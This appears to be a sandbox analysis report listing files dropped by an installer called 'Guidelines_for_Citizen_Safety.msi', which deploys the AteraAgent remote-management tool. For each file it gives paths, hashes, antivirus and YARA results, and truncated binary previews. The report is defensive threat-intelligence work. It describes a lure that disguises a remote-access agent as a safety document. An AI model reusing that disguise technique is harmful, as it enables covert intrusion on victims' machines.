                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI87B3.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):61448
                                                                                                                                                                                                                                                                          Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                          MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                          SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                          SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                          SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI8A82.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):437348
                                                                                                                                                                                                                                                                          Entropy (8bit):6.648137068438554
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:6t3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4KsT:CzOE2Z34KGzOE2Z34KI
                                                                                                                                                                                                                                                                          MD5:56B28B24351849E7467AFE43841CB321
                                                                                                                                                                                                                                                                          SHA1:5F5EBEEFC79074F1F21715ACEDF0DA636873EDF0
                                                                                                                                                                                                                                                                          SHA-256:9C3BF9E7CFAF415AB66D3D47267FCD992AD5B656D7A2B9DD6372312650E7DB31
                                                                                                                                                                                                                                                                          SHA-512:B3F415DB85276BEC2145FD0B76DBEEEC3FE144783A0BDBFFA4AEC608B54736259FA38902D1601C6852B1296106E17C9D453809968E88CD2E16C632701E8EBE66
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI8A82.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:...@IXOS.@.....@.)xY.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent!.Guidelines_for_Citizen_Safety.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI8A93.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):216496
                                                                                                                                                                                                                                                                          Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                          MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                          SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                          SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                          SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI8B30.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):216496
                                                                                                                                                                                                                                                                          Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                          MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                          SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                          SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                          SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI8C79.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):216496
                                                                                                                                                                                                                                                                          Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                          MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                          SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                          SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                          SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSIA9F5.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):521954
                                                                                                                                                                                                                                                                          Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                          MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                          SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                          SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                          SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):25600
                                                                                                                                                                                                                                                                          Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                          MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                          SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                          SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                          SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSIA9F5.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1538
                                                                                                                                                                                                                                                                          Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                          MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                          SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                          SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                          SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSIA9F5.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):184240
                                                                                                                                                                                                                                                                          Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                          MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                          SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                          SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                          SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSIA9F5.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):711952
                                                                                                                                                                                                                                                                          Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                          MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                          SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                          SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                          SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSIA9F5.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):61448
                                                                                                                                                                                                                                                                          Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                          MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                          SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                          SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                          SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):1.173915831942788
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:JSbX72Fjs6AGiLIlHVRpUh/7777777777777777777777777vDHFlmJC1c/Xl0i5:JO6QI5EP86F
                                                                                                                                                                                                                                                                          MD5:2FB05FDA2F83919E8A9507261360E010
                                                                                                                                                                                                                                                                          SHA1:0168A2C6A3450E50513B207243E289503174800C
                                                                                                                                                                                                                                                                          SHA-256:BCB3ECDDDE353A7115D77BBF3D6591A155786D8C0AA2466F9208B3F5C5DC8B86
                                                                                                                                                                                                                                                                          SHA-512:28BE04E0978F3D7C2082A33F804B9CA70DC347AF197E23E1A588FACA524E65D7EDC5E97543BD6B5D39946552C7613E1A537586632003DFA5D66AA9B40A1F9020
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):1.5756843868543453
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:CJ8Ph9uRc06WXJKFT5B9PqISoedGPdGfMpr7MONStedGPdGRubkZn:Nh91BFTv9iIB7oYZ
                                                                                                                                                                                                                                                                          MD5:D36078FC13607F98C31714BEC1ECEABA
                                                                                                                                                                                                                                                                          SHA1:2E863BE55D1FEEA70F4DCF32A46E754C1C7015FE
                                                                                                                                                                                                                                                                          SHA-256:2B33B8B1305B5C18EFAB55AE78BB813B5E465A9BE8365ABB098CD7DE526E0DC1
                                                                                                                                                                                                                                                                          SHA-512:6CFA4F0CA554583F2FD0097236A02083D3029DDA64C39B9FC9B6B9972DB499A0E936220CAE802F85F81F3D9EB6016C3914E71F7B97C1CB5CC949069505F4765C
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):360001
                                                                                                                                                                                                                                                                          Entropy (8bit):5.362967125642403
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaub:zTtbmkExhMJCIpEy
                                                                                                                                                                                                                                                                          MD5:D7C66A0AA6FDC674D76C1AF96FFA2534
                                                                                                                                                                                                                                                                          SHA1:1524C76F45A6070AD68784A0326E6525D7E4A8A0
                                                                                                                                                                                                                                                                          SHA-256:6B2D7FF6E73457156DBA7BE86405D0B54DD0788D05DC3A88202209B4FD80D687
                                                                                                                                                                                                                                                                          SHA-512:FD66A710DA635288CF3DD11ADAE2B72B96865A15308BA871270D59C565A2D4A4FB34CDFDE2A54381FE7B1503EAEE301C3006F7F2875C2E07F861AA60B36B4C81
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                                                                                                                                                          C:\Windows\System32\InstallUtil.InstallLog

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):704
                                                                                                                                                                                                                                                                          Entropy (8bit):4.805280550692434
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:tIDRFK4mAX7RBem7hccD+PRem7hUhiiGNGNdg6MhgRBem7hccD+PRem7hUGNGNkm:Us43XVBVhcmMRVhMipNVeBVhcmMRVhro
                                                                                                                                                                                                                                                                          MD5:EF51E16A5B81AB912F2478FE0A0379D6
                                                                                                                                                                                                                                                                          SHA1:B0F9E2EE284DD1590EA31B2D3AD736D77B9FC6A7
                                                                                                                                                                                                                                                                          SHA-256:2C5D5397CEDF66DB724FED7FB4515B026A894F517A0DFBE8AE8ADF52DB61AA22
                                                                                                                                                                                                                                                                          SHA-512:296A11DB55BFEE7D87897BB63BC9E2C05786D3FD73A894DA5AF76F7A756495C6CCC0959C88844DFB5560DE2374A257201D960E004EC09D8C9DFB50952C5EF2D2
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\System32\InstallUtil.InstallLog, Author: Joe Security
